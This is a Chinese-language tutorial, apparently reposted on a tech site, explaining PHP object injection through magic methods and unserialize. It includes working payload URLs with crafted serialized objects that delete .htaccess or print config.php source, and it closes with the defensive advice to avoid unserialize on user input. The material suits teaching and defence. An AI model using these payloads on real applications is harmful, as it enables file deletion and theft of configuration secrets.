<em>Mac</em>Book项目 2009年学校开始实施<em>Mac</em>Book项目,所有师生配备一本<em>Mac</em>Book,并同步更新了校园无线网络。学校每周进行电脑技术更新,每月发送技术支持资料,极大改变了教学及学习方式。因此2011
2021-06-01 09:32:01
php物件注入是一個非常常見的漏洞,這個型別的漏洞雖然有些難以利用,但仍舊非常危險,為了理解這個漏洞,請讀者具備基礎的php知識。
如果你覺得這是個渣渣洞,那麼請看一眼這個列表,一些被審計狗挖到過該漏洞的系統,你可以發現都是一些耳熟能詳的玩意(就國外來說)
除此之外等等一堆系統,八成可能大概在這些還有其他的php程式中還有很多這種型別的漏洞,所以不妨考慮坐下喝杯咖啡並且試著去理解這篇文章。
類和變數是非常容易理解的php概念,打個比方,下面的程式碼在一個類中定義了一個變數和一個方法。
#!php <?php class TestClass { // 一個變數 public $variable = 'This is a string'; // 一個簡單的方法 public function PrintVariable() { echo $this->variable; } } // 建立一個物件 $object = new TestClass(); // 呼叫一個方法 $object->PrintVariable(); ?>
php類可能會包含一些特殊的函數叫magic函數,magic函數命名是以符號“__”開頭的,比如 __construct, __destruct, __toString, __sleep, __wakeup 和其他的一些玩意。
這些函數在某些情況下會自動呼叫,比如:
__construct 當一個物件建立時呼叫 (constructor) __destruct 當一個物件被銷燬時呼叫 (destructor) __ toString當一個物件被當作一個字串使用
為了更好的理解magic方法是如何工作的,讓我們新增一個magic方法在我們的類中。
#!php <?php class TestClass { // 一個變數 public $variable = 'This is a string'; // 一個簡單的方法 public function PrintVariable() { echo $this->variable . '<br />'; } // Constructor public function __construct() { echo '__construct <br />'; } // Destructor public function __destruct() { echo '__destruct <br />'; } // Call public function __toString() { return '__toString<br />'; } } // 建立一個物件 // __construct會被呼叫 $object = new TestClass(); // 建立一個方法 // 'This is a string' 這玩意會被輸出 $object->PrintVariable(); // 物件被當作一個字串 // __toString 會被呼叫 echo $object; // End of PHP script // php指令碼要結束了, __destruct會被呼叫 ?>
這個指令碼會輸出這狗樣:
__construct
This is a string
__toString
__destruct
php允許儲存一個物件方便以後重用,這個過程被稱為序列化,打個比方,你可以儲存一個包含著使用者資訊的物件方便等等重用。
為了序列化一個物件,你需要呼叫 “serialize”函數,函數會返回一個字串,當你需要用到這個物件的時候可以使用“unserialize”去重建物件。
讓我們在序列化丟進那個例子,看看序列化張什麼樣。
</pre> <pre> #!php <?php // 某類 class User { // 類資料 public $age = 0; public $name = ''; // 輸出資料 public function PrintData() { echo 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />'; } } // 建立一個物件 $usr = new User(); // 設定資料 $usr->age = 20; $usr->name = 'John'; // 輸出資料 $usr->PrintData(); // 輸出序列化之後的資料 echo serialize($usr); ?>
它會輸出
User John is 20 years old.
O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}
你可以看到序列化之後的資料中 有 20和John,其中沒有任何跟類有關的東西,只有其中的資料被資料化。
為了使用這個物件,我們用unserialize重建物件。
#!php <?php // 某類 class User { // Class data public $age = 0; public $name = ''; // Print data public function PrintData() { echo 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />'; } } // 重建物件 $usr = unserialize('O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";}'); // 呼叫PrintData 輸出資料 $usr->PrintData(); ?>
這會輸出
User John is 20 years old
magic函數constructor (__construct)和 destructor (__destruct) 是會在物件建立或者銷燬時自動呼叫,其他的一些magic函數會在serialize 或者 unserialize的時候被呼叫。
__sleep magic方法在一個物件被序列化的時候呼叫。__wakeup magic方法在一個物件被反序列化的時候呼叫。
注意 __sleep 必須返回一個陣列與序列化的變數名。
#!php <?php class Test { public $variable = 'BUZZ'; public $variable2 = 'OTHER'; public function PrintVariable() { echo $this->variable . '<br />'; } public function __construct() { echo '__construct<br />'; } public function __destruct() { echo '__destruct<br />'; } public function __wakeup() { echo '__wakeup<br />'; } public function __sleep() { echo '__sleep<br />'; return array('variable', 'variable2'); } } // 建立一個物件,會呼叫 __construct $obj = new Test(); // 序列化一個物件,會呼叫 __sleep $serialized = serialize($obj); //輸出序列化後的字串 print 'Serialized: ' . $serialized . <br />'; // 重建物件,會呼叫 __wakeup $obj2 = unserialize($serialized); //呼叫 PintVariable, 會輸出資料 (BUZZ) $obj2->PrintVariable(); // php指令碼結束,會呼叫 __destruct ?>
這玩意會輸出:
__construct
__sleep
Serialized: O:4:"Test":2:
{s:8:"variable";s:4:"BUZZ";s:9:"variable2";s:5:"OTHER";}
__wakeup
BUZZ
__destruct
__destruct
你可以看到,我們建立了一個物件,序列化了它(然後__sleep被呼叫),之後用序列化物件重建後的物件建立了另一個物件,接著php指令碼結束的時候兩個物件的__destruct都會被呼叫。
現在我們理解了序列化是如何工作的,我們該如何利用它?事實上,利用這玩意的可能性有很多種,關鍵取決於應用程式的流程與,可用的類,與magic函數。
記住序列化物件的值是可控的。
你可能會找到一套web程式的原始碼,其中某個類的__wakeup 或者 __destruct and其他亂七八糟的函數會影響到web程式。
打個比方,我們可能會找到一個類用於臨時將紀錄檔儲存進某個檔案,當__destruct被呼叫時,紀錄檔檔案會被刪除。然後程式碼張這狗樣。
#!php <?php class LogFile { // log檔名 public $filename = 'error.log'; // 某程式碼,儲存紀錄檔進檔案 public function LogData($text) { echo 'Log some data: ' . $text . '<br />'; file_put_contents($this->filename, $text, FILE_APPEND); } // Destructor 刪除紀錄檔檔案 public function __destruct() { echo '__destruct deletes "' . $this->filename . '" file. <br />'; unlink(dirname(__FILE__) . '/' . $this->filename); } } ?>
某例子關於如何使用這個類
#!php <?php include 'logfile.php'; // 建立一個物件 $obj = new LogFile(); // 設定檔名和要儲存的紀錄檔資料 $obj->filename = 'somefile.log'; $obj->LogData('Test'); // php指令碼結束啦,__destruct被呼叫,somefile.log檔案被刪除。 ?>
在其他的指令碼,我們可能又恰好找到一個呼叫“unserialize”函數的,並且恰好變數是使用者可控的,又恰好是$_GET之類的什麼玩意的。
#!php <?php include 'logfile.php'; // ... 一些狗日的程式碼和 LogFile 類 ... // 簡單的類定義 class User { // 類資料 public $age = 0; public $name = ''; // 輸出資料 public function PrintData() { echo 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />'; } } // 重建 使用者輸入的 資料 $usr = unserialize($_GET['usr_serialized']); ?>
你看,這個程式碼呼叫了 “LogClass” 類,並且有一個 “unserialize” 值是我們可以注入的。
所以構造類似這樣的東西:
script.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}
究竟發生了什麼呢,因為輸入是可控的,所以我們可以構造任意的序列化物件,比如:
#!php <?php $obj = new LogFile(); $obj->filename = '.htaccess'; echo serialize($obj) . '<br />'; ?>
這個會輸出
O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess";}
__destruct deletes ".htaccess" file.
現在我們將構造過後的序列化物件傳送給剛才的指令碼:
script.php?usr_serialized=O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess”;}
這會輸出
__destruct deletes ".htaccess" file.
現在 .htaccess 已經被幹掉了,因為指令碼結束時 __destruct會被呼叫。不過我們已經可以控制“LogFile”類的變數啦。
這就是漏洞名稱的由來:變數可控並且進行了unserialize操作的地方注入序列化物件,實現程式碼執行或者其他坑爹的行為。
雖然這不是一個很好的例子,不過我相信你可以理解這個概念,unserialize自動呼叫 __wakeup 和 __destruct,接著攻擊者可以控制類變數,並且攻擊web程式。
先不談 __wakeup 和 __destruct,還有一些很常見的注入點允許你利用這個型別的漏洞,一切都是取決於程式邏輯。
打個比方,某使用者類定義了一個__toString為了讓應用程式能夠將類作為一個字串輸出(echo $obj) ,而且其他類也可能定義了一個類允許__toString讀取某個檔案。
#!php <?php // … 一些include ... class FileClass { // 檔名 public $filename = 'error.log'; //當物件被作為一個字串會讀取這個檔案 public function __toString() { return file_get_contents($this->filename); } } // Main User class class User { // Class data public $age = 0; public $name = ''; // 允許物件作為一個字串輸出上面的data public function __toString() { return 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />'; } } // 使用者可控 $obj = unserialize($_GET['usr_serialized']); // 輸出 __toString echo $obj; ?>
so,我們構造url
script.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}
再想想,如果我們用序列化呼叫 FileClass呢
我們建立利用程式碼
#!php <?php $fileobj = new FileClass(); $fileobj->filename = 'config.php'; echo serialize($fileobj); ?>
接著用生成的exp注入url
script.php?usr_serialized=O:9:"FileClass":1:{s:8:"filename";s:10:"config.php”;}
接著網頁會輸出 config.php的原始碼
#!php
<?php
$private_data = 'MAGIC';
?>
ps:我希望這讓你能夠理解。
可能其他的一些magic函數海存在利用點:比如__call 會在物件呼叫不存在的函數時呼叫,__get 和 __set會在物件嘗試存取一些不存在的類,變數等等時呼叫。
不過需要注意的是,利用場景不限於magic函數,也有一些方式可以在一半的函數中利用這個漏洞,打個比方,一個模組可能定義了一個叫get的函數進行一些敏感的操作,比如存取資料庫,這就可能造成sql注入,取決於函數本身的操作。
別在任何使用者可控的地方使用“unserialize”,可以考慮“json_decode“
雖然很難找到而且很難利用,但是這真的真的很嚴重,可以導致各種各樣的漏洞。
到此這篇關於一文帶你搞懂PHP物件注入的文章就介紹到這了,更多相關PHP物件注入內容請搜尋it145.com以前的文章或繼續瀏覽下面的相關文章希望大家以後多多支援it145.com!
相關文章
<em>Mac</em>Book项目 2009年学校开始实施<em>Mac</em>Book项目,所有师生配备一本<em>Mac</em>Book,并同步更新了校园无线网络。学校每周进行电脑技术更新,每月发送技术支持资料,极大改变了教学及学习方式。因此2011
2021-06-01 09:32:01
综合看Anker超能充系列的性价比很高,并且与不仅和iPhone12/苹果<em>Mac</em>Book很配,而且适合多设备充电需求的日常使用或差旅场景,不管是安卓还是Switch同样也能用得上它,希望这次分享能给准备购入充电器的小伙伴们有所
2021-06-01 09:31:42
除了L4WUDU与吴亦凡已经多次共事,成为了明面上的厂牌成员,吴亦凡还曾带领20XXCLUB全队参加2020年的一场音乐节,这也是20XXCLUB首次全员合照,王嗣尧Turbo、陈彦希Regi、<em>Mac</em> Ova Seas、林渝植等人全部出场。然而让
2021-06-01 09:31:34
目前应用IPFS的机构:1 谷歌<em>浏览器</em>支持IPFS分布式协议 2 万维网 (历史档案博物馆)数据库 3 火狐<em>浏览器</em>支持 IPFS分布式协议 4 EOS 等数字货币数据存储 5 美国国会图书馆,历史资料永久保存在 IPFS 6 加
2021-06-01 09:31:24
开拓者的车机是兼容苹果和<em>安卓</em>,虽然我不怎么用,但确实兼顾了我家人的很多需求:副驾的门板还配有解锁开关,有的时候老婆开车,下车的时候偶尔会忘记解锁,我在副驾驶可以自己开门:第二排设计很好,不仅配置了一个很大的
2021-06-01 09:30:48
不仅是<em>安卓</em>手机,苹果手机的降价力度也是前所未有了,iPhone12也“跳水价”了,发布价是6799元,如今已经跌至5308元,降价幅度超过1400元,最新定价确认了。iPhone12是苹果首款5G手机,同时也是全球首款5nm芯片的智能机,它
2021-06-01 09:30:45